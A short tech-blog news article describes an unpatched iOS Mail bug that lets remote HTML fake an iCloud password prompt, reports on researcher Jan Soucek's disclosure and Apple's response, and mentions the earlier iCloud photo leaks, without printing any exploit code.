Technology with attitude

iOS Mail App Download – Fix iCloud Passwords Bugs


Apparently, Apple slipped an unpatched bug in Mail app which could be a security threat for consumers, because they might be fooled to enter their iCloud passwords. Bad intended phishing hackers would get their hands on these passwords and use them in their own interest.

According to researcher Jan Soucek, who has a proof that there is a tool that exploits iOS, the iCloud passwords could be stolen through Mail app and the users are not even aware of this bug. He said on GitHub that “this bug allows remote HTML content to be loaded, replacing the content of the original email message,” and “JavaScript is disabled in this UIWebView, but it is still possible to build a functional password “collector” using simple HTML and CSS.”

It seems that the code uses cookies and detects that the user has visited the page before and the code stops displaying the password, to eliminate any suspicion. To demonstrate how this exploit works, Soucek posted a one minute YouTube video, which you can watch below:

Soucek demonstrated that everything looks perfectly normal, because the password field has autofocus enabled, and this way, Apple’s official password prompt is mimicked. The users are advised to wait until prompted when they’re not using Mail, when they need to log into their iCloud accounts again.

Soucek explained that in January 2015 he found this bug in Mail app which resulted in HTML tags in email messages not being ignored and the vulnerability was filed under Radar #19479280 but Apple didn’t fix the bug and Soucek thought it’s his duty to warn the users about this danger. That’s why he published the proof of concept code on GitHub.

Apple became aware of this problem, but one of the specialists said that this isn’t a “serious” security flaw, because the device’s data isn’t compromised. However, it’s very serious because it’s not an old school security issue, as it’s a combination between social engineering and cloud services.

Last fall, there was a huge scandal involving many celebrities whose nude photos were stolen from their iCloud accounts and Apple came with a guide to teach its users to visit the genuine iCloud page. The FBI investigated a hacker after their attention was drawn by a flagged IP address.